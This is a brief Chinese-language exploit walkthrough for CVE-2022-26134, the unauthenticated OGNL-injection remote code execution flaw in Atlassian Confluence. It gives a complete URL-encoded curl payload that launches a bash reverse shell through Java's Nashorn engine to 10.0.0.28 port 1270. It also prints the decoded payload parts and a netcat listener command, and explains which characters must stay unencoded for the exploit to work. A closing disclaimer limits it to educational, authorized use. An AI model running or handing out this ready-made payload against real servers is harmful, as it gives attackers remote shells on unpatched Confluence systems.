CVE-2022-26134 是一个影响 Atlassian Confluence 的严重 远程代码执行 (RCE) 漏洞。该漏洞允许未经认证的攻击者通过向易受攻击的端点注入 OGNL 表达式来执行任意代码。
以下 curl 命令演示了该漏洞的主动利用,使用 Java 的 Nashorn 引擎执行反向 Shell:
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/
在进行这些修改时,我们还需要考虑 URL 编码。 概念验证中的载荷字符串并未完全进行 URL 编码。某些字符(特别是 "."、"-" 和 "/")未被编码。 虽然并非总是如此,但对于该漏洞利用而言,这对载荷的正常运行至关重要。如果这些字符中的任何一个被编码, 服务器将以不同的方式解析 URL,并且载荷可能不会执行。这意味着在修改载荷后,我们不能对整个载荷应用 URL 编码。
${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}
new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()
nc -lvnp 1270
本文档仅供 教育目的 使用。未经授权利用系统是非法的,并可能导致严重后果。在进行安全评估之前,请务必获得适当的授权。